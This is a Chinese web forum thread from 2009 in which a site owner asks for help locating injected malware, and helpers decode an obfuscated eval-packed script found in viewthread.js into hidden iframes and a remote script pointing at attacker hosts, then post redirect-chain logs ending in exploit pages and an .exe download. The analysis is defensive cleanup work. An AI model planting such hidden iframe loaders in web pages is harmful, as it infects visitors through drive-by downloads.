全民求助，帮忙检测挂马位置 (= = # 挂了 ~ by IllusionWing)

弧光

之前发过。挂马位置也清理干净了。漏洞也补了。但是现在偶尔还是被报恶意代码。关键是源码都是正常的。代码从什么地方来的呢？
   目前报马的软件有360的防挂马检测，瑞星的全功能套装。
源码分析没有找到问题。希望高手帮忙看看。
网址：http://www.360fandu.cn/index.php
挂马是跟定给挂了。但是具体位置希望说明一下

幸福的猪猪

真的被挂马咯。。。

http://www.360fandu.cn/include/javascript/viewthread.js 由此网址解，得出：（略有删减）

if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5.l(\'<9 7=0 k=1 i="8://m.n.6.4/a/e.c?2"><9 7=0 k=1 i="8://m.n.6.4/a/g.c?3">\')',62,24,'|100|111|222|cn|document|gov|height|http|iframe|images|javascript|jpg|js|kiss|language|miss|script|src|ubb|width|writeln|www|xcrsrc'.split('|'),0,{}));}

利用上面网页提供的线索得出：
document.writeln('<script language=javascript src=http://www.xcrsrc.gov.cn/images/ubb.js></script><iframe height=0 width=100 src="http://www.xcrsrc.gov.cn/images/kiss.jpg?111"></iframe><iframe height=0 width=100 src="http://www.xcrsrc.gov.cn/images/miss.jpg?222"></iframe>')

挂马地址，就出来咯！



关于:hxxp://www.xcrsrc.gov.cn/images/kiss.jpg?111解密的日志(全体输出 -  28):
Level  1>http://bbs.xcdx169.net/templates/default/fckb6.htm?520520
Level  2>http://s3.bengbeng1.3322.org/b038093/b03.htm
Level  3>http://s3.bengbeng1.3322.org/new.html
Level  4>http://s3.bengbeng1.3322.org/real11.htm
Level  5>http://s3.bengbeng1.3322.org/realplay.js
Level  6>http://wdb.8800.org:8808/ciji.css  ●
Level  4>http://s3.bengbeng1.3322.org/real10.htm
Level  5>http://s3.bengbeng1.3322.org/real.js
Level  6>http://wdb.8800.org:8808/ciji.css  ●
Level  4>http://s3.bengbeng1.3322.org/dir.htm
Level  5>http://s3.bengbeng1.3322.org/sao.jpg
Level  5>http://s3.bengbeng1.3322.org/lang.jpg
Level  6>http://wdb.8800.org:8808/ciji.css  ●
Level  4>http://s3.bengbeng1.3322.org/zhin.js
Level  5>http://s3.bengbeng1.3322.org/xxfx.htm
Level  5>http://s3.bengbeng1.3322.org/bfyy.htm
Level  6>http://s3.bengbeng1.3322.org/bf.js
Level  7>http://wdb.8800.org:8808/ciji.css  ●
Level  6>http://s3.bengbeng1.3322.org/bff.js
Level  5>http://s3.bengbeng1.3322.org/as.htm
Level  6>http://s3.bengbeng1.3322.org/of.css  
Level  6>http://s3.bengbeng1.3322.org/of1.css  ●
Level  6>http://s3.bengbeng1.3322.org/of.js
Level  7>http://wdb.8800.org:8808/ciji.css  ●
Level  5>http://s3.bengbeng1.3322.org/lzz.htm
Level  6>http://s3.bengbeng1.3322.org/lzz.js
Level  7>http://wdb.8800.org:8808/ciji.css  ●
Level  4>http://s3.bengbeng1.3322.org/xnnn.js
日志由 Redoce2.0第36次修正版于 2009-8-27 16:32:51 生成。


关于:hxxp://www.xcrsrc.gov.cn/images/kiss.jpg?111解密的日志(全体输出 -  9):
Level  1>http://www.xcrsrc.gov.cn/images/miss.jpg?222
Level  2>http://bbs.xcdx169.net/templates/default/fckd6.htm?123
Level  3>http://bbs.xcdx169.net/templates/default/inc/inde7.htm?520
Level  4>http://bbs.xcdx169.net/templates/default/inc/tj3.js
Level  4>http://bbs.xcdx169.net/templates/default/inc/var3.js
Level  5>http://bbs.xcdx169.net/forumdata/inc/d4.exe  ●
Level  4>http://bbs.xcdx169.net/templates/default/inc/of3.htm
Level  5>http://bbs.xcdx169.net/templates/default/inc/of3.js
Level  6>http://bbs.xcdx169.net/forumdata/inc/d4.exe  ●
日志由 Redoce2.0第36次修正版于 2009-8-27 16:34:52 生成。

[ 本帖最后由 幸福的猪猪 于 2009-8-27 16:35 编辑 ]

IllusionWing

说实话。。我没发现。。
我怀疑是360和瑞星直接把你的站点作为恶意站点入库了。。

弧光

我把这个文件发上来。我看了没有恶意代码呀
viewthread.rar (3.9 KB, 下载次数: 105)

2009-8-27 16:42 上传

点击文件名下载附件

IllusionWing

确实被挂了。不过这个挂马很隐蔽。

弧光

能确认位置马？谢谢了。我真的没有办法了

IllusionWing

原始 - http://www.360fandu.cn/include/javascript/viewthread.js
插件 - ExtSusCodeScanner - 疑似挂马，请处理JSPack后再试。

IllusionWing

把这个文件
http://www.360fandu.cn/include/javascript/viewthread.js
开头的
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5.l(\'<h f=b i=8://m.n.6.4/a/j.d></h><9 7=0 k=1 i="8://m.n.6.4/a/e.c?2"></9><9 7=0 k=1 i="8://m.n.6.4/a/g.c?3"></9>\')',62,24,'|100|111|222|cn|document|gov|height|http|iframe|images|javascript|jpg|js|kiss|language|miss|script|src|ubb|width|writeln|www|xcrsrc'.split('|'),0,{}));}
去掉

Micropoint

路过问下，这个是病毒么？
http://wdb.8800.org:8808/1.css

IllusionWing

原始 - http://www.360fandu.cn/index.php
原始 - http://www.360fandu.cn/include/javascript/common.js
原始 - http://drmcmm.baidu.com/js/m.js
原始 - http://www.360fandu.cn/pic.php
原始 - http://www.360fandu.cn/archiver/
原始 - http://www.360fandu.cn/rss.php?auth=0
原始 - http://www.360fandu.cn/include/javascript/viewthread.js
开始自动解析 - http://www.360fandu.cn/include/javascript/viewthread.js


此分析日志由 Illusion Wing 使用 Astox v1 Build 1100 在 2009年8月27日16时50分10秒 生成。
原始 - http://www.xcrsrc.gov.cn/images/ubb.js
原始 - http://www.xcrsrc.gov.cn/images/kiss.jpg?111
原始 - http://www.xcrsrc.gov.cn/images/miss.jpg?222
原始 - http://bbs.xcdx169.net/templates/default/fckb6.htm?520520
原始 - http://s3.bengbeng1.3322.org/b038093/b03.htm
原始 - http://s3.bengbeng1.3322.org/b038093/b03.htm
开始自动解析 - http://s3.bengbeng1.3322.org/b038093/b03.htm
L1 - http://s3.bengbeng1.3322.org/b038093/../new.html
L2 - http://s3.bengbeng1.3322.org/b038093/../xnnn.js
L2 - http://s3.bengbeng1.3322.org/b038093/../zhin.js
L2 - http://s3.bengbeng1.3322.org/b038093/../dir.htm
L2 - http://s3.bengbeng1.3322.org/b038093/../real10.htm
L2 - http://s3.bengbeng1.3322.org/b038093/../real11.htm
L3 - http://s3.bengbeng1.3322.org/b038093/../lzz.htm
L3 - http://s3.bengbeng1.3322.org/b038093/../as.htm
L3 - http://s3.bengbeng1.3322.org/b038093/../bfyy.htm
L3 - http://s3.bengbeng1.3322.org/b038093/../xxfx.htm
L3 - http://s3.bengbeng1.3322.org/b038093/../lang.jpg
L3 - http://s3.bengbeng1.3322.org/b038093/../sao.jpg
L3 - http://s3.bengbeng1.3322.org/b038093/../real.js
L3 - http://s3.bengbeng1.3322.org/b038093/../realplay.js
L4 - http://s3.bengbeng1.3322.org/b038093/../lzz.js
L4 - http://s3.bengbeng1.3322.org/b038093/../of.js
自动解析 - Auto XOR - 高度可疑 - http://wdb.8800.org:8808/ciji.css
L4 - http://s3.bengbeng1.3322.org/b038093/../of1.css
L4 - http://s3.bengbeng1.3322.org/b038093/../of.css
L4 - http://s3.bengbeng1.3322.org/b038093/../bff.js
L4 - http://s3.bengbeng1.3322.org/b038093/../bf.js

输出的对象 - http://wdb.8800.org:8808/ciji.css

此分析日志由 Illusion Wing 使用 Astox v1 Build 1100 在 2009年8月27日16时53分20秒 生成。